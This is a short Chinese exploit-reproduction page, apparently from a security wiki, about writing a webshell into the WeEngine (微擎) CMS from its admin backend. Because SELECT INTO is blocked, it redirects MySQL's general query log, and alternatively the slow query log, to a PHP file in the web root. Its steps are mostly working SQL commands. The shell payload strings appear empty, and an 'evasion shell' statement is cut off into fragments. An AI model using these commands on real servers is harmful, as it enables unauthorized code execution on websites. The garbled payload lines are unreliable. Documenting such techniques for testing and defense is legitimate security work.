# 微擎 后台绕过禁用函数写shell
========================
一、漏洞简介
————
二、漏洞影响
————
三、复现过程
————
### 1.站点设置里面打开调试
![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId25.png)
### 2.执行语句
select into被禁止
![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId27.png)
### 3.利用日志文件写shell
show variables like ‘%general%’; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址
select ‘‘ #写入shell
![](/static/qingy/微擎_后台绕过禁用函数写shell/img/rId29.png)
### 4.SQL查询免杀shell的语句
SELECT “‘a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$
### 补充:来自土司\@GuoKerSb的分享
在无法修改general\_log\_file指向的地址且网站用户量多时刻处于查询的状态,我们还可以通过启动slow\_query\_log(慢查询日志,默认关闭)来写shell
set global slow_query_log=1;
set global slow_query_log_file=’/var/www/html/1.php’;
select ‘‘ or sleep(11);
四、参考链接
————
>
请登录后查看评论内容